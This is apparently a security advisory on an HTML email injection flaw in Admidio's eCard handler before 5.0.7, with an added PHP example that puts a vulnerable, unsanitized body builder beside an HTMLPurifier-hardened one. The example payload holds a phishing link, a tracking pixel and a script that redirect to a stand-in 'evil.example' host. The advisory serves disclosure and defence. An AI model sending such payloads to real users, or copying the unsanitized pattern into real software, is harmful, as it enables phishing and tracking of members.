Admidio
cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*
- <= 5.0.6
A vulnerability in Admidio's eCard send handler prior to version 5.0.7 allows authenticated users to inject arbitrary HTML and JavaScript into greeting card emails. The handler reads the eCard message directly from the raw POST value instead of the copy that has been sanitized by HTMLPurifier, so the intended sanitization step is bypassed. The injected content is delivered unchanged to other members as the body of the eCard and can be used for phishing.
Exploitation of this vulnerability allows for HTML email injection, where arbitrary HTML, including phishing links and tracking pixels, can be sent to other members. The injected content appears to come from a trusted source within the organization, increasing the likelihood of successful phishing attempts.
To reproduce this vulnerability, send an eCard through the eCard send handler with raw HTML in the message field, for example a phishing link and a tracking pixel. Because the handler never passes the raw value through HTMLPurifier, the markup survives into the outgoing email and is rendered by the recipient's email client.
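The following is an added example, not Admidio's own code, that shows the pattern the advisory describes: an email body built from the raw POST value beside the same body built from the HTMLPurifier-sanitized value. The field name `ecard_message`, the function names, and the payload are assumptions for illustration; HTMLPurifier is assumed to be installed via Composer (`ezyang/htmlpurifier`).

```php
<?php
// Added example; not code from Admidio. Assumes Composer-installed HTMLPurifier
// and a hypothetical POST field name 'ecard_message'.
require_once __DIR__ . '/vendor/autoload.php';

// Constructed payload of the kind the advisory describes: a phishing link,
// a 1x1 tracking pixel and a script block hidden behind a friendly greeting.
const SAMPLE_PAYLOAD = 'Happy birthday! '
    . '<a href="https://evil.example/login">Please confirm your member login</a>'
    . '<img src="https://evil.example/track.gif?u=42" width="1" height="1">'
    . '<script>document.location="https://evil.example/steal"</script>';

/** Vulnerable pattern: the raw POST value goes straight into the email body. */
function buildEcardBodyVulnerable(array $post): string
{
    $message = $post['ecard_message'] ?? '';   // no sanitization at all
    return '<html><body><div>' . $message . '</div></body></html>';
}

/** Hardened pattern: the message is run through HTMLPurifier with a tight allowlist. */
function buildEcardBodyHardened(array $post): string
{
    $config = HTMLPurifier_Config::createDefault();
    // A greeting needs only simple formatting: no images, no scripts, no event handlers.
    // Remove a[href] from this list if cards should never carry links at all.
    $config->set('HTML.Allowed', 'p,br,b,strong,i,em,a[href]');
    // javascript: and data: URIs in any surviving href are dropped.
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true, 'mailto' => true]);
    // No definition cache directory is needed for a one-off script.
    $config->set('Cache.DefinitionImpl', null);
    $purifier = new HTMLPurifier($config);

    $message = $purifier->purify((string) ($post['ecard_message'] ?? ''));
    return '<html><body><div>' . $message . '</div></body></html>';
}

// Simulate the POST the advisory's reproduction step describes.
$post = ['ecard_message' => SAMPLE_PAYLOAD];

echo "Vulnerable body (pixel and script survive):\n";
echo buildEcardBodyVulnerable($post), "\n\n";

echo "Hardened body (img and script removed, link scheme restricted):\n";
echo buildEcardBodyHardened($post), "\n";
```

In the hardened output the `<img>` tracking pixel and the `<script>` element (including its contents, which HTMLPurifier treats as hidden-element content) are gone; the link survives only because `a[href]` is explicitly allowlisted and its scheme is https. The security-relevant difference is not the allowlist itself but that the value written into the email is the purified one, which is exactly what the pre-5.0.7 handler skipped.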
Users are advised to update to Admidio version 5.0.7 or later, where this vulnerability has been fixed.